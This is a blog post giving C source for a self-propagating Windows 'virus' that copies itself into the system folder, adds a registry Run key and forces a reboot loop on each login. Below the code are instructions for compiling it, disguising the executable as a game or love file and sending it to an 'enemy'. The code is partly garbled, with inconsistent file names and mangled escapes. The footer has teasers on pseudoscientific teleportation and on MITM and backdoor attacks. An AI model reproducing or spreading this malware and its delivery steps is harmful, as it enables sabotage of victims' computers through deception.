Skip to main content

Source code to restart windows

Source code to Restart your PC every time… this is a simple program which make a .exe in SYSTEM folder…and create registry to run file when we login… Source:- #include#include#includeint found,drive_no; char buff[128]; void findroot() { int done; struct ffblk ffblk; //File block structure done=findfirst(“C:\\windows\ \system”,&ffblk,FA_DIREC); // to determine the root drive if(done==0) { done=findfirst(“C:\\windows\ \system\ \shacker.exe”,&ffblk,0); // to determine whether the virus is already installed or not if(done==0) { found=1; //means that the system is already infected return; } drive_no=1; return; } done=findfirst(“D:\\windows\ \system”,&ffblk,FA_DIREC); if(done==0) { done=findfirst(“D:\\windows\ \system\ \shacker.exe”,&ffblk,0); if(done==0) { found=1;return; } drive_no=2; return; } done=findfirst(“E:\\windows\ \system”,&ffblk,FA_DIREC); if(done==0) { done=findfirst(“E:\\windows\ \system\ \shacker.exe”,&ffblk,0); if(done==0) { found=1; return; } drive_no=3; return; } done=findfirst(“F:\\windows\ \system”,&ffblk,FA_DIREC); if(done==0) { done=findfirst(“F:\\windows\ \system\ \shacker.exe”,&ffblk,0); if(done==0) { found=1; return; } drive_no=4; return; } else exit(0); } void main() { FILE *self,*target; clrscr(); findroot(); if(found==0) //if the system is not already infected { self=fopen(_argv[0],”rb”); // The virus file open’s itself switch(drive_no) { case 1: target=fopen(“C:\\windows\ \system \\shacker.exe”,”wb”); //to place a copy of itself in a remote place system(“REG ADD HKEY_CURRENT_USER\ \Software\ \Microsoft\\Windows\ \CurrentVersion\ \Run \/v sres \/t REG_SZ \/d C:\\windows\ \system\\ sysres.exe”); //put this file to registry for starup break; case 2: target=fopen(“D:\\windows\ \system \\shacker.exe”,”wb”); system(“REG ADD HKEY_CURRENT_USER\ \Software\ \Microsoft\\Windows\ \CurrentVersion\\Run \/v sres \/t REG_SZ \/dD:\\windows\ \system\ \sysres.exe”); break; case 3: target=fopen(“E:\\windows\ \system \\shacker.exe”,”wb”); system(“REG ADD HKEY_CURRENT_USER\ \Software\ \Microsoft\\Windows\ \CurrentVersion\\Run \/v sres \/t REG_SZ \/dE:\\windows\ \system\ \sysres.exe”); break; case 4: target=fopen(“F:\\windows\ \system \\shacker.exe”,”wb”); system(“REG ADD HKEY_CURRENT_USER\ \Software\ \Microsoft\\Windows\ \CurrentVersion\\Run \/v sres \/t REG_SZ \/dF:\\windows\ \system\ \sysres.exe”); break; default: exit(0); } while(fread(buff,1,1,self)>0) fwrite(buff,1,1,target); fcloseall(); } else system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart } Copy this code in notepad and open it in Turbo C++ Compiler… NOTE:- 1. This can harm your Computer..that do not run in your own PC… 2. If Bi-mistake you run Program than Goto safe mode and delete Shacker.exe file from System folder… Now you ask me how to send this virus to Victim… 1. Open this program in Turbo C++… 2. Now Press F9 to linking it…. this can create .exe file in Source folder…. 3. Now Copy the .exe file and rename it any thing like GAME,Love etc… 4. ok…you complete..send the file to your enemy… NOTE:- 1. Do not Run OR Compile the Proggy… if you have any problem than comment me …otherwise mail me….. Best of luck,….enjoy the Virus….

Comments

Popular posts from this blog

Physical Teleportation Theoretical method to do It!

Teleportation is the ability of moving matter from one point in time and space to another point in time and space instantaneously. There are different types of teleportation available at this time both visual and physical teleportation are possible and we use visual teleportation as our starting point. Types Visual body teleportation Astral body teleportation The different types of visual teleportation are. visual body or astral body teleportation , or visual object teleportation but before we can master teleportation we must first learn the art of Telekinesis/Psychokinesis and Clairsentience and the higher state of consciousness the seventh sense. Other abilities useful in teleportation are Tele-Visualization and ESP (Extrasensory Perception). The ability of teleportation is used in Time travel, Interstellar travel, and Dimensional travel. Teleportation is the near instantaneous transport of the Psychic from one location to another and there is no other fo...

Man in the middle attack

Man-in-the-Middle Attack ————————————— Man-In-The-Middle attack is the type of attack where attackers intrude into an existing connection to intercept the exchanged data and inject false information. It involves eavesdropping on a connection, intruding into a connection, intercepting messages, and selectively modifying data. DEFINITION : —————— The term "Man-in-the-middle attack" (MITM attack) refers to the type of attack where the attacker intrudes into the communication between the endpoints on a network to inject false information and intercept the data transferred between them. MITM attack is also known as: ————————————— Bucket-brigade attack —————————— Fire brigade attack —————————...

Trojan blackdoor

What is trojan backdoor ? Backdoor.Trojan is a detection name used by Symantec to identify malicious software programs that share the primary functionality of enabling a remote attacker to have access to or send commands to a compromised computer. As the name suggests, these threats are used to provide a covert channel through which a remote attacker can access and control a computer. The Trojans vary in sophistication, ranging from those that only allow for limited functions to be performed to those that allow almost any action to be carried out, thus allowing the remote attacker to almost completely take over control of a computer. A computer with a sophisticated back door program installed may also be referred to as a "zombie" or a "bot". A network of such bots may often be referred to as a "botnet". Botnets have been well publicized in the news over the years, with different instances being given specific names such as Kraken, Mariposa, or Kneber, alon...